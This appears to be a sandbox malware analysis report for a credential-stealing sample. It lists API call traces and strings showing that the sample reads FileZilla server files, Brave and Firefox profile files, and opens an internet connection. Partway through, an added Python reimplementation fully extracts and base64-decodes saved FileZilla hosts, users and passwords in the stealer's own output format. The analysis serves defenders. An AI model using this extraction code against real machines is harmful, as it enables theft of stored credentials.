                                  • Opcode Fuzzy Hash: db71b2644b607f4f0fe3999c46c73f5052a10d81e8deaffe03971d3098661201
                                  • Instruction Fuzzy Hash: CD62E431911616ABCB23AF64DC49EAF77F9AF14301F454124FC09AB260DB34EE59DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003569C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00356A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00356A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00356AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00356B35
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356B9D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: 34ac9f7c5e9157e1a57f8fe0cfcf2d50d11a368976851c7b00d2cdaad4437086
                                  • Instruction ID: 67812bffe5a78e4fba2d47812fca8420ecec83844f35e1410999fc1abf09377e
                                  • Opcode Fuzzy Hash: 34ac9f7c5e9157e1a57f8fe0cfcf2d50d11a368976851c7b00d2cdaad4437086
                                  • Instruction Fuzzy Hash: 06429570A11206ABCB23ABB4EC4AEAF7BB9AF54701F854414FC05EB251DF34D949DB60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DBEF
                                  • lstrlen.KERNEL32(00374CA8), ref: 0034DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC17
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 0034DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC4C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DC8F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0034DCD0
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0034DCF0
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0034DD0A
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0034DD1D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DD7B
                                  • lstrlen.KERNEL32(00371794), ref: 0034DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDA3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DDAF
                                  • lstrlen.KERNEL32(?), ref: 0034DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DE19
                                  • lstrlen.KERNEL32(00371794), ref: 0034DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DE6F
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DE7B
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DEBB
                                  • lstrlen.KERNEL32(00371794), ref: 0034DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DEE6
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DEF2
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFA5
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DFB1
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DFF4
                                  • lstrlen.KERNEL32(00371794), ref: 0034DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E022
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034E02E
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0034E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034E0E7
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E11F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0034E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E1F9
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E22F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E261
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 0034E269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0034E988
                                  • FindClose.KERNEL32(00000000), ref: 0034E997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 56ed9bec6ed5ad5573987cde6b0e0c137f4324a6bd6a0b683160ed6e6b955507
                                  • Instruction ID: 9b5adc94fd7117a7c0e69af83b4b36f45227a5f4bf43e213c1a8a1b2cf3a44e4
                                  • Opcode Fuzzy Hash: 56ed9bec6ed5ad5573987cde6b0e0c137f4324a6bd6a0b683160ed6e6b955507
                                  • Instruction Fuzzy Hash: A5526D71A102069BCB22EF64DC89AAF7BF9AF54300F454528F849AF251DB34FC55DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003460FF
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346152
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346185
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003461B5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003461F0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00346233
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps identical to those listed above)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 2f8ef9c98b7b70f184b236ce9c1383645e6c52f513883d20e53e10003de80e0b
                                  • Instruction ID: 8d59c279cc576b21e84c18a19ce891e0a762765942c05a425d44ad2b89ccba88
                                  • Opcode Fuzzy Hash: 2f8ef9c98b7b70f184b236ce9c1383645e6c52f513883d20e53e10003de80e0b
                                  • Instruction Fuzzy Hash: 6E525B71910216ABCB22EFA4EC49AAF77F9AF15300F558424F809AF251DB34FC45DBA1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356B9D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BCD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BFD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00356C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00356C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00356C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00356C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00356CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00356CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00356D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00356D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00356DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00356E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00356E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00356EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00356EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00356ED4
                                  • lstrlen.KERNEL32(?), ref: 00356F6E
                                  • lstrlen.KERNEL32(?), ref: 00356F81
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps identical to those listed above)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 32c0b03af63cf2918e489a7f7bc9d78ff995e704b70c83f7b2fc0dd5bc89acd3
                                  • Instruction ID: e9ef075cc22794b84da66db77041f039e9971e96b8cd74cd617503fee313fc3d
                                  • Opcode Fuzzy Hash: 32c0b03af63cf2918e489a7f7bc9d78ff995e704b70c83f7b2fc0dd5bc89acd3
                                  • Instruction Fuzzy Hash: 2302B230A11205ABCB22ABB4EC4EEAF7BB9AF14701F454454FC05EB251DF34E949DB60
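The routine above is the FileZilla credential grab: the trace shows a heap buffer allocated with the constant 0xF423F (999,999) passed to the heap allocation, then StrStrA substring searches for the literal tags <Host>, <Port>, <User> and <Pass encoding="base64">, a CryptStringToBinaryA call with dwFlags = 1 (CRYPT_STRING_BASE64) to decode the password, and the output labels "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ". The following Python reimplementation is an added example for analysts, not code recovered from the sample: it reproduces that substring-driven extraction over a constructed XML document laid out like FileZilla's recentservers.xml / sitemanager.xml (the on-disk layout, the record field order and composing "url" as host:port are assumptions; the trace establishes only the four tag strings and the output labels). It also shows one failure mode the substring approach has: an entry with no <Pass> element would, with unbounded searching, pick up the next entry's password, so each lookup here is confined to the span before the next <Host>.

```python
import base64
import binascii

# Constructed sample laid out like FileZilla's recentservers.xml / sitemanager.xml.
# The file layout is an assumption; the sandbox trace only establishes the four
# tag strings the routine searches for with StrStrA.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>2222</Port>
      <User>deploy</User>
      <Pass encoding="base64">Y29ycmVjdGhvcnNl</Pass>
    </Server>
    <Server>
      <Host>anon.mirror.test</Host>
      <Port>21</Port>
      <User>anonymous</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# The four literals the trace shows being passed to StrStrA.
HOST_TAG = "<Host>"
PORT_TAG = "<Port>"
USER_TAG = "<User>"
PASS_TAG = '<Pass encoding="base64">'


def _text_after(region, tag):
    """StrStrA-style lookup: locate tag in region and return the text up to the
    next '<' (None if the tag is absent)."""
    i = region.find(tag)
    if i < 0:
        return None
    i += len(tag)
    j = region.find("<", i)
    return region[i:] if j < 0 else region[i:j]


def _decode_password(b64):
    """Stand-in for CryptStringToBinaryA(..., CRYPT_STRING_BASE64 (=1), ...):
    returns the decoded text, or None if the field is missing or malformed."""
    if b64 is None:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_filezilla(buf):
    """Return one record per <Host> occurrence. Each search is bounded to the
    span before the next <Host>, so an entry without <Pass> does not borrow the
    following entry's password (a hardening the substring-based original lacks)."""
    records = []
    start = buf.find(HOST_TAG)
    while start >= 0:
        nxt = buf.find(HOST_TAG, start + len(HOST_TAG))
        region = buf[start: nxt if nxt >= 0 else len(buf)]
        records.append({
            "host": _text_after(region, HOST_TAG) or "",
            "port": _text_after(region, PORT_TAG) or "",
            "login": _text_after(region, USER_TAG) or "",
            "password": _decode_password(_text_after(region, PASS_TAG)),
        })
        start = nxt
    return records


def format_record(rec):
    """Assemble the text block from the literal labels seen in the dump
    ('browser: FileZilla', 'profile: null', 'url: ', 'login: ', 'password: ').
    Field order and the host:port form of 'url' are assumptions."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['login']}\n"
        f"password: {rec['password'] or ''}\n"
    )


if __name__ == "__main__":
    for rec in parse_filezilla(SAMPLE_XML):
        print(format_record(rec))
```

Run against a real recentservers.xml from a test VM, the output is a reasonable approximation of what this routine stages for exfiltration; the only protection the file format offers is base64, so FileZilla saved-site passwords should be treated as plaintext on any host where this sample ran.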
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354B7F
                                  • lstrlen.KERNEL32(00374CA8), ref: 00354B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BA7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 00354BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00354BFA
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps identical to those listed above)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: c1c5b749861b6c94a541f5f521be456068282c94132d6b10c4d8494d3129a9eb
                                  • Instruction ID: b937960ab98e42526b9b5fefcd72abe4fab03b94c2685535e311d3c28d435062
                                  • Opcode Fuzzy Hash: c1c5b749861b6c94a541f5f521be456068282c94132d6b10c4d8494d3129a9eb
                                  • Instruction Fuzzy Hash: 9C925F70A016018FDB26CF29D958F6AB7F5AF44316F5A80ADEC099B271D731EC85CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00351291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003512BF
                                  • lstrlen.KERNEL32(00374CA8), ref: 003512CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512E7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 003512F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0035133A
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035135C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351376
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003513AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003513D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003513E2
                                  • lstrlen.KERNEL32(00371794), ref: 003513ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035140A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351416
                                  • lstrlen.KERNEL32(?), ref: 00351423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035147A
                                  • StrCmpCA.SHLWAPI(?,00FAC6F8), ref: 003514A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003514E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351535
                                  • StrCmpCA.SHLWAPI(?,00FAD470), ref: 00351552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003515BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003515E4
                                  • StrCmpCA.SHLWAPI(?,00FAC668), ref: 00351602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351685
                                  • StrCmpCA.SHLWAPI(?,00FAC518), ref: 003516B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003516F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003517BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003517F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035181C
                                  • FindClose.KERNEL32(00000000), ref: 0035182B
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps identical to those listed above)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 2e5ca9da05a5bbce62994dd785182f9114e568fd0d6c5c43eb388852bbc72467
                                  • Instruction ID: 5d4e6b92a3e5aece94c6a32a4f39f91722b6c33866ef69443412447e7757b0d7
                                  • Opcode Fuzzy Hash: 2e5ca9da05a5bbce62994dd785182f9114e568fd0d6c5c43eb388852bbc72467
                                  • Instruction Fuzzy Hash: 001253719102069BCB26EF78DC49EAF77F4AF44301F454528FC4AAB250DB34EC599BA0
                                  APIs
                                  • wsprintfA.USER32 ref: 0035CBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035CC13
                                  • lstrcat.KERNEL32(?,?), ref: 0035CC5F
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035CC71
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035CC8B
                                  • wsprintfA.USER32 ref: 0035CCB0
                                  • PathMatchSpecA.SHLWAPI(?,00FA8918), ref: 0035CCE2
                                  • CoInitialize.OLE32(00000000), ref: 0035CCEE
                                    • Part of subcall function 0035CAE0: CoCreateInstance.COMBASE(0036B110,00000000,00000001,0036B100,?), ref: 0035CB06
                                    • Part of subcall function 0035CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0035CB46
                                    • Part of subcall function 0035CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0035CBC9
                                  • CoUninitialize.COMBASE ref: 0035CD09
                                  • lstrcat.KERNEL32(?,?), ref: 0035CD2E
                                  • lstrlen.KERNEL32(?), ref: 0035CD3B
                                  • StrCmpCA.SHLWAPI(?,0036CFEC), ref: 0035CD55
                                  • wsprintfA.USER32 ref: 0035CD7D
                                  • wsprintfA.USER32 ref: 0035CD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0035CDB0
                                  • wsprintfA.USER32 ref: 0035CDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035CDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0035CE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0035CE28
                                  • CloseHandle.KERNEL32(00000000), ref: 0035CE33
                                  • CloseHandle.KERNEL32(00000000), ref: 0035CE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0035CE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035CE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 0035CF8D
                                  • FindClose.KERNEL32(?), ref: 0035CF9F
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true (associated dumps identical to those listed above)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: a5b3972be8ec535e0b7cda0a4afcd26e0d0dc596fe26aad37c9a3634184f8f58
                                  • Instruction ID: cc88d32676edef1464af006712865cd95b4bcdc21ca4cac2a15d2d4bb95d941a
                                  • Opcode Fuzzy Hash: a5b3972be8ec535e0b7cda0a4afcd26e0d0dc596fe26aad37c9a3634184f8f58
                                  • Instruction Fuzzy Hash: DEC161719102199FCB21DF64DC49EEE77B9BF58305F004598F909A7290EE34AE98DFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00351291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003512BF
                                  • lstrlen.KERNEL32(00374CA8), ref: 003512CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512E7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 003512F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0035133A
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035135C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351376
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003513AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003513D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003513E2
                                  • lstrlen.KERNEL32(00371794), ref: 003513ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035140A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351416
                                  • lstrlen.KERNEL32(?), ref: 00351423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035147A
                                  • StrCmpCA.SHLWAPI(?,00FAC6F8), ref: 003514A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003514E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351535
                                  • StrCmpCA.SHLWAPI(?,00FAD470), ref: 00351552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003515BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003515E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003517BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003517F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035181C
                                  • FindClose.KERNEL32(00000000), ref: 0035182B
                                  Memory Dump Source
